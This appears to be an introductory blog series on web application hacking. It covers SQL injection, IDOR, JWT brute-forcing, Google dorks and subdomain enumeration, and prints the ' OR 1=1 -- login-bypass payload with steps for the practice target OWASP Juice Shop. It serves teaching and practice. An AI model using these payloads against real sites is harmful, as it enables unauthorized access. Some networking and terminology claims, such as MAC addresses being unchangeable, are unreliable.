This information is solely for educational purposes. We will not be held responsible for any misuse of the information done by the user.
PRACTICAL WEB APPS HACKING: Day -1
SQL Injection (also known as SQLi)
SQL injection is one of the most common web hacking techniques.
SQL injection is used to attack the database of Web applications. It is a code injection technique that is used to execute malicious code in SQL statements, via web page input.
1. What is SQL injection (SQLi)?
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.
In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure or perform a denial-of-service attack.
2. What is the impact of a successful SQL injection attack?
A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for an extended period.
Recently, the Databases of Dominos and Linkedin got leaked on Dark Web.
Attack Flow of SQLi:
Here, ' OR 1 = 1 -- is a malicious Payload through which we can attack the website.
Workflow of the payload:
In the SQL query, the Username and password are matched from the database and the login is approved.
If the user enters ' OR 1 = 1 -- instead of the username, then the SQL query would be as follows:
SELECT * from table
WHERE USER = '' OR 1 = 1 --
AND PASSWORD = 'anything'
By this payload, the USER is assigned by the closing single quote (') and then the condition OR 1 = 1 -- is given which signifies TRUE value for the query for the USER and then double hyphen (--) is used for commenting the proceeding part in the query.
This signifies that the Attacker would be logged in on the website through the account on present on the first record of the table.
Generally, the first user in the database is admin as the admin creates the application. If the attacker is successful in this attack, he might get access to the admin login page and carry out his malicious deeds.
There is no guarantee that this Payload will work every time as many defensive things have already been deployed.
Also, OR 1 = 1 -- payload is the most basic payload of SQLi.
How can we protect our website from such attacks?
We can protect our website from such attacks in many ways. We can whitelist some of the keywords and block any other keywords coming through the user. The main ideology for preventing such kinds of attacks is "Never trust your user-input". You can refer Owasp Prevention cheat sheet for SQL Injection.
If we try to attack a website, would they know they are being attacked?
Yes, they would come to know that they are being attacked as the log with timestamp is being maintained in the server about each and every activity (e.g. who is accessing the server, who is entering the server, who is leaving the server, all the necessary credentials).
Where can we try and execute this payload successfully?
We can try such payloads on Owasp Juice Shop which is a vulnerable site developed by Owasp.
The Open Web Application Security Project® (OWASP) is a nonprofit foundation that works to improve the security of software.
To try this payload on Owasp Juice Shop,
1. Open Owasp Juice Shop
2. Click on Account --> Login
3. Write the payload in the email and anything in the password, then click on Log In button
4. You will be logged in to admin account.
Please refer to Authentication By-pass for more payloads on Authentication By-pass.
PRACTICAL WEB APPS HACKING: Day -2
Insecure Direct Object Reference (IDOR)
Insecure direct object references (IDOR) are a type of access control vulnerability in digital security that arises when an application uses user-supplied input to access objects directly.This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication.
The term IDOR was popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
e.g. If there is a website and we are viewing the user information of our account
Website's URL will be: website_name.com/tech/view_user_info?user_id=01
If the website is vulnerable to IDOR, we can change the user_id and get other users' information. Suppose, if we change the user_id to 02, we will get the user information of user 02's account.
Website's updated URL will be: website_name.com/tech/view_user_info?user_id=02
In short, IDOR is an application that directly exposes a reference to an object using the user-supplied input.
Using IDOR you will be able to access
- User Details
- Files (secret files on the server)
Privilege escalation happens here as through IDOR normal user is able to do the tasks that can only be done by the admin user.
There are two methods through which the frontend interacts with the backend:
1. GET - values/parameter passes in the URL.
2. POST - value passes in the HTTP request body.
(POST method is carried out on Kali Linux using the tool Burp Suite which is actually a proxy tool)
CTF
CTF stands for Capture the Flag. It is a game made for hackers to practice security concepts.
You can practice some of the above concepts on Hacker101 CTF. It contains many challenges and by finding each flag we get specific points. Overall, it is a fun game to play.
Some useful websites:
Free Password Hash Cracker: https://crackstation.net/Free MD5 Encryption: https://www.md5online.org/md5-encrypt.html
Forced browsing using IDOR
The user interacts with the CDN (Content Delivery Network) server which is also called the front-end server. CDN is directly connected to the main server.
Content Delivery Network is actually a network of CDNs. The frontend codes, i.e. HTML, CSS, Javascript codes are present on the CDNs (Sometimes media files also might be available on CDNs). To make the content availability easier, the data files may also be available on CDNs.
Suppose, the user uploads an image on his account, and the image gets uploaded to CDN as well. If it is to be stored on CDN, it will have an address so that it can be accessible later on.
Let the address be: website_name.com/user/private/image1.jpg
If, somehow the attacker gets to know about this URL, and he sends a GET request to the server of this URL as follows:
GET website_name.com/user/private/image1.jpg
Using this, he is able to get access to the private image of the user. Now, using the same method and just by manipulating the image name/code (i.e. by change image1 to image2), the attacker can get access to many private images of the user.
.: By Bruteforcing the image names, the attacker was able to access all the private images of the user stored on the server.
1. GET - fetch information from the server (Doesn't contain body).
Here GET method was used by the attacker for fetching the user's private data.
2. POST - send data to the server (contains body).
Here POST method was used to upload the user's image on the server.
This happens because the web application doesn't map to file permission to the user's session.
PRACTICAL WEB APPS HACKING: Day -3
IP Spoofing
There are two types of addresses:
1. Physical Address - MAC address (you can find it on the NIC card of your device). MAC address is just like the DNA of your device using which your device can be identified uniquely. MAC address cannot be changed.
2. Logical Address - IP Address. IP addresses are logical addresses, which is assigned to the NIC card. IP address can be changed. IP address looks as follows:
Here the Attacker and the user are connected to the same network. The user's IP address is 10.11.12.13 and the attacker's IP address is 10.11.12.14 . Let us say that the person is browsing facebook.com, what happens is when the user requests the page, the page comes back to him. Through the IP address, Facebook comes to know that where the packets (data) have to be sent.
The attacker comes to know about the user's IP address and the attacker changes his IP address from 10.11.12.14 (his IP address) to 10.11.12.13 (the user's IP address).
Now, when the page comes to the switch, the switch gets confused about whether to send the data to computer A (user's computer) or to computer B (attacker's computer) as both of them have the same IP address. Therefore the switch sends the data to both the computers (computer A & B). Through this the attacker is also able to access the user's Facebook data.
This is known as IP Spoofing.
Using an IP address the connection is created between the web server and the user/client. Which is also known as the web session of the user.
Through the following website, you can know whether your data has been leaked in data breaches or not:
Have I been Pwned: https://haveibeenpwned.com/
Evil Twin attack has been one of the most effective attacks to attack Wifi.
Credential Stuffing
Suppose, the data(e.g. email id, password, etc) of the user is exposed in a company's data breach, and let us say that the user has the same password for most of his accounts.
Now, the attacker gets the password from the database leak and he tries to login onto a different platform through the user's data (email id and password). The attacker is able to login onto 3 platforms out of 5 through the user's data. This is known as Credential Stuffing.
From protecting yourself from Credential Stuffing you can turn on MFA (Multi-Factor Authentication) or 2-FA (2-Factor Authentication).
Threat Intelligence
Threat intelligence is a domain in Cyber Security which deals with such database leaks.
Suppose there is a cybersecurity company and the company is providing its service to a bank. Somehow the credit card details of all the customers of the bank got leaked over the dark web in a data breach.
Now, what the company does is it keeps looking on the dark web of such leaks and as soon as the company comes to know of the data leak on the dark web, the company informs the bank that these credit card details are leaked on the dark web and immediately inform the customer to stop using the credit card and block the credit card. The bank can block those credit cards on their end as well.
This is known as Threat Intelligence.
Information Gathering
Ethical hacking has 5 steps and the very first step amongst those is Information Gathering. Information gathering is the most important step in an attack scenario(the more perfect you are in information gathering, the better hacker you are). In any attack, 80% is information gathering and 20% is exploitation (attacking).
Google Docking (Advanced Google Search)
Google Dorking is a hacking technique that makes use of Google's advanced search services to locate valuable data or hard-to-find content.Google Dorking is also known as "Google hacking." (Click here to know more)
For Dorking, we need to have a live target that we can get from Hackerone platform in Bug Bounty Section.
inurl:uber.com => Display only uber.com in results
site:uber => Display uber related sites in results
site:.in => Display .in sites in results
inurl:bigbasket site:.in => Display .in sites with bigbasket present in their url in results
These modification commands only displays TLD (Top Level Domain) sites.
In site: we can use .in,.com,.co.in, etc.
intitle:admin/login/college => Searches in title bar and displays the results accordingly
intitle:admin login => Display the admin login page of websites listed on google in results
filetype: pdf => Display websites containing pdf file type in results
filetype: docx => Display websites containing docx file type in results
Whois Lookup tells us about fundamental details of a website.
e.g. If we type domain of Uber
We get all the important details of Uber.com
This happened with Google this year. Click here to know more.
VirusTotal:
The sub-domains which will show 200 response in the status codes section, they will be accessible by any user over the internet.
Sometimes, the sub-domains are used for hosting third party services as well.
Some useful websites:
Free Password Hash Cracker: https://crackstation.net/
Free MD5 Encryption: https://www.md5online.org/md5-encrypt.html
Practice challenges on picoCTF.
Sub-domain
A subdomain is an additional part to your main domain name. Subdomains are created to organize and navigate to different sections of your website. You can create multiple subdomains or child domains on your main domain.
Generally, We do not get vulnerabilities on the main page, we get more vulnerabilities on the Sub-domain pages.
We can get more details of subdomains such as list of subdomains on Sublist3r on Kali Linux or using VirusTotal website on google.
Sublist3r:
Out of these subdomains, only some of them are accessible by us. To check which sub-domains are accessible by us, copy the sub-domains and go to page httpstatus.io, then paste all the sub-domains in the box and click on check status.
Sub-domain takeover is also possible.
PRACTICAL WEB APPS HACKING: Day -4
CTF for beginners
You can practice some of the above concepts on picoCTF. It contains many challenges for beginners. Overall, it is a fun game to play.Some useful websites:
Free Password Hash Cracker: https://crackstation.net/
Free MD5 Encryption: https://www.md5online.org/md5-encrypt.html
Practice challenges on picoCTF.
Robots.txt
Robots.txt file restricts the web crawler from accessing some pages on the website. A robots.txt file tells search engine crawlers which URLs the crawler can access on your site. This is used mainly to avoid overloading your site with requests; it is not a mechanism for keeping a web page out of Google. To keep a web page out of Google, block indexing with noindex or password-protect the page.
Reverse Engineering
There are many open-source software in which the source code is public and free to use. Let us say you are downloading the source code of Mozilla Firefox (an open-source software) and changing the black theme to a white theme in the code i.e. modifying the code as per your ease and then compiling it with the help of the browser. This is an example of Reverse Engineering.
What is .htaccess and what is it used for?
htaccess file is a powerful website file that controls the high-level configuration of your website. On servers that run Apache (a web server software), the .htaccess file allows you to make changes to your website's configuration without having to edit server configuration files.What is CyberChef?
CyberChef uses a number of techniques to attempt to automatically detect which encodings your data is under. If it finds a suitable operation that can make sense of your data, it displays the 'magic' icon in the Output field which you can click to decode your data.
What is HexEd.it
HexEd.it is a free hex editor for Windows, MacOS, Linux, and all other modern operating systems. A hex editor (or binary file editor or byte editor) is a computer program that allows for manipulation of the fundamental binary data that constitutes a computer file. The name 'hex' comes from 'hexadecimal', a standard numerical format for representing binary data. Analyze hexadecimal binary dumps and files, read, manipulate, write, import, and export byte as well as bit data in this web app.Number Conversion Website
Binary / Decimal / HexaDecimal to Binary / Decimal / HexaDecimal Converter: https://www.rapidtables.com/convert/number/hex-to-decimal.html
PRACTICAL WEB APPS HACKING: Day -5
Shoulder Surfing
In computer security, shoulder surfing is a type of social engineering techniqueJWT (JASON Web Token)
Let us understand JASON Web Token(JWT) by a real-life example:
Suppose a User's laptop/pc gets crashed due to some software/hardware problem, and the user goes to a computer repair shop. The employee tells the user that it will take around 2 days for repairing the laptop/pc to be working perfectly fine. For assurance, the computer shop's employee gave the user a receipt that had some of the user details written on it (e.g. name, contact, laptop/pc model number, the issue with laptop/pc, etc).
A guy was standing near the user and was shoulder surfing and he got all the details of the user. Now, he duplicates the receipt with the user's details filled in it and he can claim the user's laptop as he has duplicated the receipt.
To prevent such malicious activities, the employee takes the signature on the receipt and gives the receipt to the user, and the employee keeps the copy of the receipt with him. When the user comes to take his laptop/pc, he verifies his signature and then handovers the laptop/pc to him after the signature is verified.
In this case, the Signature played a major role as it was used to verify the authenticity of the user/customer for security purposes.
Whenever we (as a client) log in to any social media website, we do not have to log in, again and again, every time we load/visit the page. This is done by Cookies. As Cookies are stored in the browser. When we log in for the first time, the server of the website sends us a cookie that is stored in the client-side of the browser i.e. our browser. Cookies store the credentials (session-id, log-in details, etc) in an encrypted format.
On relating the above scenario, we see that the receipt is acting as the cookie in this case. For storing the cookie securely in our browser, we use JASON Web Token aka JWT (which acts as a signature on the receipt).
JWT is divided into 3 parts separated by a period(.)
- The red part indicates the header(algorithm and token type).
- The purple part indicates the payload(data).
- The blue part indicates the Signature.
- Header and Payload are base64 encoded.
- The header contains metadata of the Payload.
- The Metadata contains the basic details of a file, e.g. if we store an image, we can also see the Name of the image, date modified, size, format, etc
- Payload carries the data e.g. user_id, email, expiry, etc.
- Signature is actually used for security purposes. It is created by an encryption algorithm HS256 - HMAC SHA 256.
Brute forcing key of JWT Signature to get access:
Tools: John the Ripper (It is a Kali Linux tool used for cracking the hashes, passwords, etc)
Wordlist: RockYou (it contains some common type of passwords, usernames, words used in web applications, etc)
Format: HS256
PRACTICAL WEB APPS HACKING: Day -6
Bug Bounty
Using your knowledge of cybersecurity to report unique security vulnerabilities to organizations and in turn, you get rewarded.
Public IP vs Private IP
Let us say, we stay in a hotel and the hotel rooms have an intercom present which is connected to the reception. The hotel could have provided a different mobile connection for each and every room but instead of doing it that way, they choose intercoms in every room as many people will be coming and staying in a hotel and if someone has malicious deeds and carries out his malicious deeds, the Hotel would be held responsible for it. And secondarily, it would be too costly to provide a different mobile connection to each and every room. Therefore, to minimize the cost and add security and monitoring to the calls, hotels have intercoms installed in their rooms.
Now, If we wanna make a call to someone, we will have to call the reception and they will connect our call to the specified person. The person will be able to see the reception's phone number.
Similarly, if you are living in a college hostel, each room has a separate LAN port so that the student can have an internet connection. And all the rooms are connected to the main router of the building (a Router is a device to connect different Networks). Now, if we want to connect to Facebook, we will have to connect to the LAN port/ Wifi which is connected to the router, and the router is connected to the webserver of Facebook. (Similar is the case when we make the connection from our ISP). In this case, our router has a public IP address and each LAN port will have a private IP address. Through this, the router will come to know which connection is requesting for the data. The main function of the router is to convert private IP to public IP as we need a public IP to browse the internet.
(The ISP provides us with public IP address through which we can browse over the internet)
Domain Name System (DNS)
It is basically the phonebook of the internet. The Domain Name System is a hierarchical and decentralized naming system for computers, services, or other resources connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating
MAC Address
MAC address is a physical address. We can find it on the NIC card of our device. MAC address is just like the DNA of your device using which your device can be identified uniquely. MAC address cannot be changed. We can vie our MAC address through the command line.
Commands for windows:
- ipconfig /all
Commands for linux:
- ifconfig
It is a 6 bytes (48 bits) address.
IPv4
To simplify the concept of MAC addresses, IP addresses were introduced.
An IP address is a logical address(that can be changed) that is used to surf the internet.
An IP address is a logical address(that can be changed) that is used to surf the internet.
It is a 4 bytes (32 bits) address.
IPv6
IPv4 address was the initial IP address but as its use increased in the devices, all the combinations were on the verge of extinction, and hence the IPv6 address was introduced.
PRACTICAL WEB APPS HACKING: Day -7
Vulnerability Assessment Penetration Test
The basic format of the VAPT report is mentioned below. You can refer to more reports on our blog in the PicoCTF Challenges category.
Title: e.g. IDOR in the login page.
Description of the Vulnerability: Through the payload, we can get access to the admin account.
Summary: summary of the bug.
Steps to reproduce: Steps of how we exploited the website to be written.
Payload: ' OR 1=1 --
Impact:
1. Access to the admin account.
2. Complete takeover of the database.
Mitigation (optional): how to improve/ rectify the bug.
1. Whitelist the keywords.
2. Don't trust user inputs.
POC (Proof of concept): provide images/ videos of the vulnerability.
You can solve more challenges on Pico CTF or hacker101 and prepare their VAPT report.
Some important Full-Forms:
SQL: Structured Query Language
API: Application Programming Interface
CTF: Capture The Flag
CDN: Content Delivery Network
TLD: Top Level Domain
ISP: Internet Service Provider
DNS: Domain Name System
All the flowcharts are designed by Omkar Ravindra Yadav.
πππ
ReplyDeleteNice workππ
ReplyDeleteGreat work πππ
ReplyDeleteGood Wotk
ReplyDelete